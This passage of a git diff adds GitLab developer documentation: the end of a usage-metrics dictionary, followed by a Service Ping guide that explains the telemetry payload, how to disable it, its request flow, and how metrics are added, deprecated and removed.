Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.release.successful_deployments` + +Total successful deployments + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181941_successful_deployments.yml) + +Group: `group::release` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.secure.api_fuzzing_pipeline` + +Counts of Pipelines that have at least 1 API Fuzzing Testing job + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216180401_api_fuzzing_pipeline.yml) + +Group: `group::fuzz testing` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage_monthly.secure.api_fuzzing_scans` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183838_api_fuzzing_scans.yml) + +Group: `` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.secure.cluster_image_scanning_pipeline` + +Pipelines containing a Cluster Image Scanning job + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210618125224_cluster_image_scanning_pipeline.yml) + +Group: `group::container security` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `ultimate` + +### `usage_activity_by_stage_monthly.secure.cluster_image_scanning_scans` + +Counts cluster image scanning jobs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210618101233_cluster_image_scanning_scans.yml) + +Group: `group::container security` + +Data Category: `Optional` + +Status: `implemented` + +Tiers: `ultimate` + +### `usage_activity_by_stage_monthly.secure.container_scanning_pipeline` + +Pipelines containing a Container Scanning job + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216175507_container_scanning_pipeline.yml) + +Group: `group::container security` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage_monthly.secure.container_scanning_scans` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183830_container_scanning_scans.yml) + +Group: `` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.secure.coverage_fuzzing_pipeline` + +Counts of Pipelines that have at least 1 coverage-guided Fuzz Testing job + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216180359_coverage_fuzzing_pipeline.yml) + +Group: `group::fuzz testing` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage_monthly.secure.coverage_fuzzing_scans` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183836_coverage_fuzzing_scans.yml) + +Group: `` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.secure.dast_pipeline` + +Count of pipelines that have at least 1 DAST job + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175618_dast_pipeline.yml) + +Group: `group::dynamic analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage_monthly.secure.dast_scans` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183832_dast_scans.yml) + +Group: `` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.secure.dependency_scanning_pipeline` + +Count of pipelines with successful Dependency Scanning jobs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216175226_dependency_scanning_pipeline.yml) + +Group: `group::composition analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage_monthly.secure.dependency_scanning_scans` + +Monthly number of users running Dependency Scanning Scans + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216183828_dependency_scanning_scans.yml) + +Group: `group::composition analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage_monthly.secure.sast_pipeline` + +Counts of Pipelines that have at least 1 SAST job + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216182129_sast_pipeline.yml) + +Group: `group::static analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.secure.sast_scans` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183826_sast_scans.yml) + +Group: `` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.secure.secret_detection_pipeline` + +Counts of Pipelines that have at least 1 Secret Detection job + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216182131_secret_detection_pipeline.yml) + +Group: `group::static analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.secure.secret_detection_scans` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183834_secret_detection_scans.yml) + +Group: `` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.secure.user_api_fuzzing_dnd_jobs` + +Count of API Fuzzing `docker-in-docker` jobs by job names + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180357_user_api_fuzzing_dnd_jobs.yml) + +Group: `group::fuzz testing` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.secure.user_api_fuzzing_jobs` + +Count of API Fuzzing jobs by job name + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180355_user_api_fuzzing_jobs.yml) + +Group: `group::fuzz testing` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.secure.user_api_fuzzing_scans` + +Number of users who have run a API Fuzzing scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210607043622_user_api_fuzzing_scans.yml) + +Group: `category::fuzz testing` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage_monthly.secure.user_container_scanning_jobs` + +Distinct count per user of Container Scanning jobs run monthly + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216175505_user_container_scanning_jobs.yml) + +Group: `group::container security` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage_monthly.secure.user_container_scanning_scans` + +Number of users who have run a Container Scanning scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210607043336_user_container_scanning_scans.yml) + +Group: `group::composition analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage_monthly.secure.user_coverage_fuzzing_jobs` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183817_user_coverage_fuzzing_jobs.yml) + +Group: `` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.secure.user_coverage_fuzzing_scans` + +Number of users who have run a Coverage Fuzzing scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210607043509_user_coverage_fuzzing_scans.yml) + +Group: `category::fuzz testing` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage_monthly.secure.user_dast_jobs` + +Users who run a DAST job + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175616_user_dast_jobs.yml) + +Group: `group::dynamic analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.secure.user_dast_scans` + +Number of users who have run a DAST scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210607041718_user_dast_scans.yml) + +Group: `group::dynamic analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage_monthly.secure.user_dependency_scanning_jobs` + +Monthly number of users creating Dependency Scanning jobs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216175222_user_dependency_scanning_jobs.yml) + +Group: `group::composition analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage_monthly.secure.user_dependency_scanning_scans` + +Number of users who have run a Dependency Scanning scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210607043301_user_dependency_scanning_scans.yml) + +Group: `group::composition analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage_monthly.secure.user_license_management_jobs` + +Monthly number of users running License Scanning jobs + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216175224_user_license_management_jobs.yml) + +Group: `group::composition analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage_monthly.secure.user_preferences_group_overview_security_dashboard` + +Users who set personal preference to see Security Dashboard on Group information page + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216182209_user_preferences_group_overview_security_dashboard.yml) + +Group: `group::threat insights` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage_monthly.secure.user_sast_jobs` + +Users who run a SAST job + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216182125_user_sast_jobs.yml) + +Group: `group::static analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.secure.user_sast_scans` + +Number of users who have run a SAST scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210607043218_user_sast_scans.yml) + +Group: `group::static analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage_monthly.secure.user_secret_detection_jobs` + +Users who run a Secret Detection job + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216182127_user_secret_detection_jobs.yml) + +Group: `group::static analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.secure.user_secret_detection_scans` + +Number of users who have run a Secret Detection scan + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210607043410_user_secret_detection_scans.yml) + +Group: `group::static analysis` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `ultimate` + +### `usage_activity_by_stage_monthly.secure.user_unique_users_all_secure_scanners` + +Missing description + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181956_user_unique_users_all_secure_scanners.yml) + +Group: `group::secure` + +Data Category: `Operational` + +Status: `data_available` + +Tiers: `free` + +### `usage_activity_by_stage_monthly.verify.ci_builds` + +Unique monthly builds in project + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175542_ci_builds.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.verify.ci_external_pipelines` + +Total pipelines in external repositories in a month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175544_ci_external_pipelines.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.verify.ci_internal_pipelines` + +Total pipelines in GitLab repositories in a month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175546_ci_internal_pipelines.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.verify.ci_pipeline_config_auto_devops` + +Total pipelines from an Auto DevOps template + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175548_ci_pipeline_config_auto_devops.yml) + +Group: `group::configure` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.verify.ci_pipeline_config_repository` + +Total Monthly Pipelines from templates in repository + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175550_ci_pipeline_config_repository.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.verify.ci_pipeline_schedules` + +Total monthly Pipeline schedules in GitLab + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175552_ci_pipeline_schedules.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.verify.ci_pipelines` + +Distinct users triggering pipelines in a month + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175554_ci_pipelines.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate`, `free` + +### `usage_activity_by_stage_monthly.verify.ci_triggers` + +Total configured Triggers in project + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216175556_ci_triggers.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.verify.clusters_applications_runner` + +Total GitLab Managed clusters with Runner enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216181951_clusters_applications_runner.yml) + +Group: `group::runner` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `usage_activity_by_stage_monthly.verify.projects_reporting_ci_cd_back_to_github` + +Projects with a GitHub repository mirror pipeline enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216175558_projects_reporting_ci_cd_back_to_github.yml) + +Group: `group::pipeline execution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `premium`, `ultimate` + +### `uuid` + +GitLab instance unique identifier + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/license/20210201124933_uuid.yml) + +Group: `group::product intelligence` + +Data Category: `Standard` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `version` + +Version of GitLab instance + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/license/20210216175601_version.yml) + +Group: `group::distribution` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` + +### `web_ide_clientside_preview_enabled` + +Whether Web IDE clientside preview is enabled + +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/settings/20210204124920_web_ide_clientside_preview_enabled.yml) + +Group: `group::editor` + +Data Category: `Optional` + +Status: `data_available` + +Tiers: `free`, `premium`, `ultimate` diff --git a/doc/development/service_ping/index.md b/doc/development/service_ping/index.md new file mode 100644 index 00000000000..41a2022473a --- /dev/null +++ b/doc/development/service_ping/index.md @@ -0,0 +1,1707 @@ +--- +stage: Growth +group: Product Intelligence +info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments +--- + +# Service Ping Guide **(FREE SELF)** + +> Introduced in GitLab Ultimate 11.2, more statistics. + +This guide describes Service Ping's purpose and how it's implemented. + +For more information about Product Intelligence, see: + +- [Product Intelligence Guide](https://about.gitlab.com/handbook/product/product-intelligence-guide/) +- [Snowplow Guide](../snowplow/index.md) + +More links: + +- [Product Intelligence Direction](https://about.gitlab.com/direction/product-intelligence/) +- [Data Analysis Process](https://about.gitlab.com/handbook/business-technology/data-team/#data-analysis-process/) +- [Data for Product Managers](https://about.gitlab.com/handbook/business-technology/data-team/programs/data-for-product-managers/) +- [Data Infrastructure](https://about.gitlab.com/handbook/business-technology/data-team/platform/infrastructure/) + +## What is Service Ping? + +Service Ping is a process in GitLab that collects and sends a weekly payload to GitLab Inc. +The payload provides important high-level data that helps our product, support, +and sales teams understand how GitLab is used. For example, the data helps to: + +- Compare counts month over month (or week over week) to get a rough sense for how an instance uses + different product features. +- Collect other facts that help us classify and understand GitLab installations. +- Calculate our Stage Monthly Active Users (SMAU), which helps to measure the success of our stages + and features. + +Service Ping information is not anonymous. It's linked to the instance's hostname. However, it does +not contain project names, usernames, or any other specific data. + +Sending a Service Ping payload is optional and can be [disabled](#disable-service-ping) on any self-managed instance. +When Service Ping is enabled, GitLab gathers data from the other instances +and can show your instance's usage statistics to your users. + +### Terminology + +We use the following terminology to describe the Service Ping components: + +- **Service Ping**: the process that collects and generates a JSON payload. +- **Service Data**: the contents of the Service Ping JSON payload. This includes metrics. +- **Metrics**: primarily made up of row counts for different tables in an instance's database. Each + metric has a corresponding [metric definition](metrics_dictionary.md#metrics-definition-and-validation) + in a YAML file. + +### Why should we enable Service Ping? + +- The main purpose of Service Ping is to build a better GitLab. Data about how GitLab is used is collected to better understand feature/stage adoption and usage, which helps us understand how GitLab is adding value and helps our team better understand the reasons why people use GitLab and with this knowledge we're able to make better product decisions. +- As a benefit of having Service Ping active, GitLab lets you analyze the users' activities over time of your GitLab installation. +- As a benefit of having Service Ping active, GitLab provides you with The DevOps Report,which gives you an overview of your entire instance's adoption of Concurrent DevOps from planning to monitoring. +- You get better, more proactive support. (assuming that our TAMs and support organization used the data to deliver more value) +- You get insight and advice into how to get the most value out of your investment in GitLab. Wouldn't you want to know that a number of features or values are not being adopted in your organization? +- You get a report that illustrates how you compare against other similar organizations (anonymized), with specific advice and recommendations on how to improve your DevOps processes. +- Service Ping is enabled by default. To disable it, see [Disable Service Ping](#disable-service-ping). +- When Service Ping is enabled, you have the option to participate in our [Registration Features Program](#registration-features-program) and receive free paid features. + +#### Registration Features Program + +> Introduced in GitLab 14.1. + +Starting with GitLab version 14.1, free self-managed users running [GitLab EE](../ee_features.md) can receive paid features by registering with GitLab and sending us activity data via [Service Ping](#what-is-service-ping). + +The paid feature available in this offering is [Email from GitLab](../../tools/email.md). +Administrators can use this [Premium](https://about.gitlab.com/pricing/premium/) feature to streamline +their workflow by emailing all or some instance users directly from the Admin Area. + +NOTE: +Registration is not yet required for participation, but will be added in a future milestone. + +### Limitations + +- Service Ping does not track frontend events things like page views, link clicks, or user sessions, and only focuses on aggregated backend events. +- Because of these limitations we recommend instrumenting your products with Snowplow for more detailed analytics on GitLab.com and use Service Ping to track aggregated backend events on self-managed. + +## View the Service Ping payload **(FREE SELF)** + +You can view the exact JSON payload sent to GitLab Inc. in the administration panel. To view the payload: + +1. Sign in as a user with [Administrator](../../user/permissions.md) permissions. +1. On the top bar, select **Menu >** **{admin}** **Admin**. +1. On the left sidebar, select **Settings > Metrics and profiling**. +1. Expand the **Usage statistics** section. +1. Select **Preview payload**. + +For an example payload, see [Example Service Ping payload](#example-service-ping-payload). + +## Disable Service Ping **(FREE SELF)** + +NOTE: +The method to disable Service Ping in the GitLab configuration file does not work in +GitLab versions 9.3 to 13.12.3. See the [troubleshooting section](#cannot-disable-service-ping-using-the-configuration-file) +on how to disable it. + +You can disable Service Ping either using the GitLab UI, or editing the GitLab +configuration file. + +### Disable Service Ping using the UI + +To disable Service Ping in the GitLab UI: + +1. Sign in as a user with [Administrator](../../user/permissions.md) permissions. +1. On the top bar, select **Menu >** **{admin}** **Admin**. +1. On the left sidebar, select **Settings > Metrics and profiling**. +1. Expand the **Usage statistics** section. +1. Clear the **Enable service ping** checkbox. +1. Select **Save changes**. + +### Disable Service Ping using the configuration file + +To disable Service Ping and prevent it from being configured in the future through +the admin area: + +**For installations using the Linux package:** + +1. Edit `/etc/gitlab/gitlab.rb`: + + ```ruby + gitlab_rails['usage_ping_enabled'] = false + ``` + +1. Reconfigure GitLab: + + ```shell + sudo gitlab-ctl reconfigure + ``` + +**For installations from source:** + +1. Edit `/home/git/gitlab/config/gitlab.yml`: + + ```yaml + production: &base + # ... + gitlab: + # ... + usage_ping_enabled: false + ``` + +1. Restart GitLab: + + ```shell + sudo service gitlab restart + ``` + +## Service Ping request flow + +The following example shows a basic request/response flow between a GitLab instance, the Versions Application, the License Application, Salesforce, the GitLab S3 Bucket, the GitLab Snowflake Data Warehouse, and Sisense: + +```mermaid +sequenceDiagram + participant GitLab Instance + participant Versions Application + participant Licenses Application + participant Salesforce + participant S3 Bucket + participant Snowflake DW + participant Sisense Dashboards + GitLab Instance->>Versions Application: Send Service Ping + loop Process usage data + Versions Application->>Versions Application: Parse usage data + Versions Application->>Versions Application: Write to database + Versions Application->>Versions Application: Update license ping time + end + loop Process data for Salesforce + Versions Application-xLicenses Application: Request Zuora subscription id + Licenses Application-xVersions Application: Zuora subscription id + Versions Application-xSalesforce: Request Zuora account id by Zuora subscription id + Salesforce-xVersions Application: Zuora account id + Versions Application-xSalesforce: Usage data for the Zuora account + end + Versions Application->>S3 Bucket: Export Versions database + S3 Bucket->>Snowflake DW: Import data + Snowflake DW->>Snowflake DW: Transform data using dbt + Snowflake DW->>Sisense Dashboards: Data available for querying + Versions Application->>GitLab Instance: DevOps Report (Conversational Development Index) +``` + +## How Service Ping works + +1. The Service Ping [cron job](https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/workers/gitlab_usage_ping_worker.rb#L30) is set in Sidekiq to run weekly. +1. When the cron job runs, it calls [`Gitlab::UsageData.to_json`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/services/submit_usage_ping_service.rb#L22). +1. `Gitlab::UsageData.to_json` [cascades down](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/usage_data.rb#L22) to ~400+ other counter method calls. +1. The response of all methods calls are [merged together](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/usage_data.rb#L14) into a single JSON payload in `Gitlab::UsageData.to_json`. +1. The JSON payload is then [posted to the Versions application]( https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/services/submit_usage_ping_service.rb#L20) + If a firewall exception is needed, the required URL depends on several things. If + the hostname is `version.gitlab.com`, the protocol is `TCP`, and the port number is `443`, + the required URL is <https://version.gitlab.com/>. + +## Service Ping Metric Life cycle + +### 1. New metrics addition + +Please follow the [Implementing Service Ping](#implementing-service-ping) guide. + +### 2. Existing metric change + +Because we do not control when customers update their self-managed instances of GitLab, +we **STRONGLY DISCOURAGE** changes to the logic used to calculate any metric. +Any such changes lead to inconsistent reports from multiple GitLab instances. +If there is a problem with an existing metric, it's best to deprecate the existing metric, +and use it, side by side, with the desired new metric. + +Example: +Consider following change. Before GitLab 12.6, the `example_metric` was implemented as: + +```ruby +{ + ... + example_metric: distinct_count(Project, :creator_id) +} +``` + +For GitLab 12.6, the metric was changed to filter out archived projects: + +```ruby +{ + ... + example_metric: distinct_count(Project.non_archived, :creator_id) +} +``` + +In this scenario all instances running up to GitLab 12.5 continue to report `example_metric`, +including all archived projects, while all instances running GitLab 12.6 and higher filters +out such projects. As Service Ping data is collected from all reporting instances, the +resulting dataset includes mixed data, which distorts any following business analysis. + +The correct approach is to add a new metric for GitLab 12.6 release with updated logic: + +```ruby +{ + ... + example_metric_without_archived: distinct_count(Project.non_archived, :creator_id) +} +``` + +and update existing business analysis artefacts to use `example_metric_without_archived` instead of `example_metric` + +### 3. Deprecate a metric + +If a metric is obsolete and you no longer use it, you can mark it as deprecated. + +For an example of the metric deprecation process take a look at this [example merge request](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/59899) + +To deprecate a metric: + +1. Check the following YAML files and verify the metric is not used in an aggregate: + - [`config/metrics/aggregates/*.yaml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/aggregates/) + - [`ee/config/metrics/aggregates/*.yaml`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/aggregates/) + +1. Create an issue in the [GitLab Data Team + project](https://gitlab.com/gitlab-data/analytics/-/issues). Ask for + confirmation that the metric is not used by other teams, or in any of the SiSense + dashboards. + +1. Verify the metric is not used to calculate the conversational index. The + conversational index is a measure that reports back to self-managed instances + to inform administrators of the progress of DevOps adoption for the instance. + + You can check + [`CalculateConvIndexService`](https://gitlab.com/gitlab-services/version-gitlab-com/-/blob/master/app/services/calculate_conv_index_service.rb) + to view the metrics that are used. The metrics are represented + as the keys that are passed as a field argument into the `get_value` method. + +1. Document the deprecation in the metric's YAML definition. Set + the `status:` attribute to `deprecated`, for example: + + ```yaml + --- + key_path: analytics_unique_visits.analytics_unique_visits_for_any_target_monthly + description: Visits to any of the pages listed above per month + product_section: dev + product_stage: manage + product_group: group::analytics + product_category: + value_type: number + status: deprecated + time_frame: 28d + data_source: + distribution: + - ce + tier: + - free + ``` + +1. Replace the metric's instrumentation with a fixed value. This avoids wasting + resources to calculate the deprecated metric. In + [`lib/gitlab/usage_data.rb`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/usage_data.rb) + or + [`ee/lib/ee/gitlab/usage_data.rb`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/lib/ee/gitlab/usage_data.rb), + replace the code that calculates the metric's value with a fixed value that + indicates it's deprecated: + + ```ruby + module Gitlab + class UsageData + DEPRECATED_VALUE = -1000 + + def analytics_unique_visits_data + results['analytics_unique_visits_for_any_target'] = redis_usage_data { unique_visit_service.unique_visits_for(targets: :analytics) } + results['analytics_unique_visits_for_any_target_monthly'] = DEPRECATED_VALUE + + { analytics_unique_visits: results } + end + # ... + end + end + ``` + +1. Update the Metrics Dictionary following [guidelines instructions](dictionary.md). + +### 4. Remove a metric + +Only deprecated metrics can be removed from Service Ping. + +For an example of the metric removal process take a look at this [example issue](https://gitlab.com/gitlab-org/gitlab/-/issues/297029) + +To remove a deprecated metric: + +1. Verify that removing the metric from the Service Ping payload does not cause + errors in [Version App](https://gitlab.com/gitlab-services/version-gitlab-com) + when the updated payload is collected and processed. Version App collects + and persists all Service Ping reports. To do that you can modify + [fixtures](https://gitlab.com/gitlab-services/version-gitlab-com/-/blob/master/spec/support/usage_data_helpers.rb#L540) + used to test + [`UsageDataController#create`](https://gitlab.com/gitlab-services/version-gitlab-com/-/blob/3760ef28/spec/controllers/usage_data_controller_spec.rb#L75) + endpoint, and assure that test suite does not fail when metric that you wish to remove is not included into test payload. + +1. Create an issue in the + [GitLab Data Team project](https://gitlab.com/gitlab-data/analytics/-/issues). + Ask for confirmation that the metric is not referred to in any SiSense dashboards and + can be safely removed from Service Ping. Use this + [example issue](https://gitlab.com/gitlab-data/analytics/-/issues/7539) for guidance. + This step can be skipped if verification done during [deprecation process](#3-deprecate-a-metric) + reported that metric is not required by any data transformation in Snowflake data warehouse nor it is + used by any of SiSense dashboards. + +1. After you verify the metric can be safely removed, + update the attributes of the metric's YAML definition: + + - Set the `status:` to `removed`. + - Set `milestone_removed:` to the number of the + milestone in which the metric was removed. + + Do not remove the metric's YAML definition altogether. Some self-managed + instances might not immediately update to the latest version of GitLab, and + therefore continue to report the removed metric. The Product Intelligence team + requires a record of all removed metrics in order to identify and filter them. + + For example please take a look at this [merge request](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/60149/diffs#b01f429a54843feb22265100c0e4fec1b7da1240_10_10). + +1. After you verify the metric can be safely removed, + remove the metric's instrumentation from + [`lib/gitlab/usage_data.rb`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/usage_data.rb) + or + [`ee/lib/ee/gitlab/usage_data.rb`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/lib/ee/gitlab/usage_data.rb). + + For example please take a look at this [merge request](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/60149/diffs#6335dc533bd21df26db9de90a02dd66278c2390d_167_167). + +1. Remove any other records related to the metric: + - The feature flag YAML file at [`config/feature_flags/*/*.yaml`](https://gitlab.com/gitlab-org/gitlab/-/tree/master/config/feature_flags). + - The entry in the known events YAML file at [`lib/gitlab/usage_data_counters/known_events/*.yaml`](https://gitlab.com/gitlab-org/gitlab/-/tree/master/lib/gitlab/usage_data_counters/known_events). + +1. Update the Metrics Dictionary following [guidelines instructions](dictionary.md). + +## Implementing Service Ping + +Service Ping consists of two kinds of data, counters and observations. Counters track how often a certain event +happened over time, such as how many CI pipelines have run. They are monotonic and always trend up. +Observations are facts collected from one or more GitLab instances and can carry arbitrary data. There are no +general guidelines around how to collect those, due to the individual nature of that data. + +There are several types of counters which are all found in `usage_data.rb`: + +- **Ordinary Batch Counters:** Simple count of a given ActiveRecord_Relation +- **Distinct Batch Counters:** Distinct count of a given 